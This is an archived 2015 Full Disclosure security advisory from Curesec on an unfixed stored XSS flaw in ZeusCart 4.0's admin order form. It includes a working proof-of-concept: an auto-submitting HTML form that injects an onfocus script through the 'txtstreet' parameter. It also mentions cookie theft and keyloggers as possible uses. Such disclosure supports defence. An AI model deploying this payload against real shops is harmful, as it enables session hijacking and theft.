lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <55F6F352.9030504@curesec.com> Date: Mon, 14 Sep 2015 18:18:26 +0200 From: "Curesec Research Team (CRT)" <crt@...esec.com> To: fulldisclosure@...lists.org Subject: [FD] ZeusCart 4.0 - XSS - not fixed ZeusCart 4.0: XSS Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@...scart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There is an XSS vulnerability via the "txtstreet" POST parameter when adding a new order. With this, it is possible to steal cookies or inject JavaScript keyloggers. 2. Proof of Concept <form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create" > <input type="hidden" name="hidOrderTotal" value="400"> <input type="hidden" name="discount" value="flat"> <input type="hidden" name="selCustomer" value="1"> <input type="hidden" name="payOption" value="8"> <input type="hidden" name="txtname" value="Primary"> <input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar"> </form> <script>document.myform.submit();</script> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists